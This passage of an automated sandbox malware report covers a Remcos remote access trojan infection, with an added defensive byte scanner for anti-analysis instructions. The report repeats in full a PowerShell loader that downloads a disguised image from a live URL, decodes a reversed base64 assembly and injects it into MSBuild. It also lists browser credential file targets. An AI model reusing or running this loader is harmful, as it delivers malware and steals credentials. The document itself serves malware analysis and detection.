                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
                        Source: MSBuild.exe, 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh'
                        Source: wscript.exe, 00000000.00000003.1702805355.0000022E1292A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: MSBuild.exe, 0000000C.00000002.2256274079.000000000100D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0044E92E GetProcessHeap
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00433CD7 SetUnhandledExceptionFilter
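Two of the evasion hits above are inline instruction sequences rather than API calls: `sldt word ptr [eax]` stores the LDT selector (zero on native 32-bit Windows; the legacy "no pill" VM check relied on older software-virtualised VMware returning a non-zero value), and `mov eax, dword ptr fs:[00000030h]` reads the PEB pointer from the TEB, which is how code checks PEB+2 (BeingDebugged) without importing IsDebuggerPresent. The following scanner is an added example written for this report, not code from Joe Sandbox or from the sample: it looks for those x86 (32-bit) encodings in a raw memory dump and goes slightly beyond the report by also matching the sibling descriptor-table reads (sidt, sgdt, str). The sample buffer is constructed; a raw byte scan is a triage aid only, since 0F 00 00 can occur in data, so confirm each hit in a disassembler.

```python
"""Scan a raw x86 (32-bit) memory dump for anti-analysis instruction encodings.

Added example for this report: the patterns are standard Intel encodings, the
SAMPLE buffer below is constructed and is not bytes taken from the analysed sample.
"""
from typing import Dict, List, Tuple

# label -> (encoding, category). ModRM 0x00 / 0x08 encode [eax] with opcode extension /0 or /1.
PATTERNS: Dict[str, Tuple[bytes, str]] = {
    "sldt word ptr [eax]":       (bytes.fromhex("0F0000"),               "vm-detection"),        # 0F 00 /0  (seen in the report)
    "str word ptr [eax]":        (bytes.fromhex("0F0008"),               "vm-detection"),        # 0F 00 /1  (generalisation)
    "sgdt [eax]":                (bytes.fromhex("0F0100"),               "vm-detection"),        # 0F 01 /0  (generalisation)
    "sidt [eax]":                (bytes.fromhex("0F0108"),               "vm-detection"),        # 0F 01 /1  (generalisation)
    "mov eax, fs:[30h]":         (bytes.fromhex("64A130000000"),         "debugger-detection"),  # PEB pointer via TEB+0x30 (seen in the report)
    "mov eax, fs:[30h] (ModRM)": (bytes.fromhex("648B0530000000"),       "debugger-detection"),  # same read, alternative encoding
    "inline IsDebuggerPresent":  (bytes.fromhex("64A1300000000FB64002"), "debugger-detection"),  # ... followed by movzx eax, byte ptr [eax+2] (PEB.BeingDebugged)
}


def scan(buf: bytes) -> List[Tuple[int, str, str]]:
    """Return (offset, label, category) for every pattern occurrence, sorted by offset."""
    hits: List[Tuple[int, str, str]] = []
    for label, (pattern, category) in PATTERNS.items():
        pos = buf.find(pattern)
        while pos != -1:
            hits.append((pos, label, category))
            pos = buf.find(pattern, pos + 1)
    return sorted(hits)


def summarize(hits: List[Tuple[int, str, str]]) -> Dict[str, List[str]]:
    """Group hit labels by category; an empty list means that class of check was not seen."""
    out: Dict[str, List[str]] = {"vm-detection": [], "debugger-detection": []}
    for _, label, category in hits:
        out[category].append(label)
    return out


# Constructed sample: a tiny function with both checks inlined.
SAMPLE = (
    b"\x55\x8b\xec"                           # push ebp; mov ebp, esp
    + bytes.fromhex("0F0000")                 # sldt word ptr [eax]                         (offset 3)
    + b"\x90\x90"                             # nop; nop
    + bytes.fromhex("64A1300000000FB64002")   # mov eax, fs:[30h]; movzx eax, byte ptr [eax+2]  (offset 8)
    + b"\x5d\xc3"                             # pop ebp; ret
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for offset, label, category in scan(data):
        print(f"0x{offset:08x}  {category:<18}  {label}")
```

Run it with a process memory dump as the argument (a full dump, not just the PE image, since the report's sldt hit sits in heap memory of the injected MSBuild.exe at 02DDF830) and treat the output as candidate offsets to verify.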

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara match, file source: amsi64_7320.amsi.csv, type: OTHER
                        Source: Yara match, file source: amsi64_7908.amsi.csv, type: OTHER
                        Source: Yara match, file source: Process Memory Space: wscript.exe PID: 7272, type: MEMORYSTR
                        Source: Yara match, file source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR
                        Source: Yara match, file source: Process Memory Space: wscript.exe PID: 7860, type: MEMORYSTR
                        Source: Yara match, file source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A (2 occurrences)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CD0008
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D96008
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00410F36 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00418754 mouse_event
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" (2 occurrences)
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" (2 occurrences)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs"
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = new-object system.net.webclient;$marmalady = $fishers.downloaddata($noninterest);$ruddle = [system.text.encoding]::utf8.getstring($marmalady);$bleekbok = '<<base64_start>>';$rouse = '<<base64_end>>';$unloose = $ruddle.indexof($bleekbok);$benedict = $ruddle.indexof($rouse);$unloose -ge 0 -and $benedict -gt $unloose;$unloose += $bleekbok.length;$tumefied = $benedict - $unloose;$biographed = $ruddle.substring($unloose, $tumefied);$backing = -join ($biographed.tochararray() | foreach-object { $_ })[-1..-($biographed.length)];$nonflavored = [system.convert]::frombase64string($backing);$hemautogram = [system.reflection.assembly]::load($nonflavored);$subcarbureted = [dnlib.io.home].getmethod('vai');$subcarbureted.invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'msbuild', '$delie','$delie','$delie','talpe', 'c:\programdata\','talpe','vbs','1','1','taskname'));" (2 occurrences)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = new-object system.net.webclient;$marmalady = $fishers.downloaddata($noninterest);$ruddle = [system.text.encoding]::utf8.getstring($marmalady);$bleekbok = '<<base64_start>>';$rouse = '<<base64_end>>';$unloose = $ruddle.indexof($bleekbok);$benedict = $ruddle.indexof($rouse);$unloose -ge 0 -and $benedict -gt $unloose;$unloose += $bleekbok.length;$tumefied = $benedict - $unloose;$biographed = $ruddle.substring($unloose, $tumefied);$backing = -join ($biographed.tochararray() | foreach-object { $_ })[-1..-($biographed.length)];$nonflavored = [system.convert]::frombase64string($backing);$hemautogram = [system.reflection.assembly]::load($nonflavored);$subcarbureted = [dnlib.io.home].getmethod('vai');$subcarbureted.invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'msbuild', '$delie','$delie','$delie','talpe', 'c:\programdata\','talpe','vbs','1','1','taskname'));"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = new-object system.net.webclient;$marmalady = $fishers.downloaddata($noninterest);$ruddle = [system.text.encoding]::utf8.getstring($marmalady);$bleekbok = '<<base64_start>>';$rouse = '<<base64_end>>';$unloose = $ruddle.indexof($bleekbok);$benedict = $ruddle.indexof($rouse);$unloose -ge 0 -and $benedict -gt $unloose;$unloose += $bleekbok.length;$tumefied = $benedict - $unloose;$biographed = $ruddle.substring($unloose, $tumefied);$backing = -join ($biographed.tochararray() | foreach-object { $_ })[-1..-($biographed.length)];$nonflavored = [system.convert]::frombase64string($backing);$hemautogram = [system.reflection.assembly]::load($nonflavored);$subcarbureted = [dnlib.io.home].getmethod('vai');$subcarbureted.invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'msbuild', '$delie','$delie','$delie','talpe', 'c:\programdata\','talpe','vbs','1','1','taskname'));"Jump to behavior
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDQ+
                        Source: MSBuild.exe, 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager)Q<
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managers
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager Q
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager1
                        Source: MSBuild.exe, 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.12.dr | Binary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00433E0A cpuid 12_2_00433E0A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoA,12_2_0040E679
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW,12_2_004470AE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,12_2_004510BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,12_2_004512EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,12_2_00447597
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW,12_2_00450CF7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW,12_2_00450D42
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW,12_2_00450DDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00448057
                        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6800, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 12_2_0040B21B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \key3.db 12_2_0040B335

                        Remote Access Functionality

                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6800, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: cmd.exe 12_2_00405042
                        MITRE ATT&CK Matrix (techniques listed per tactic, in the row order of the original matrix; a number in parentheses is the badge the report shows next to a technique matched by this sample)

                        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                        Resource Development: Scripting (421); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
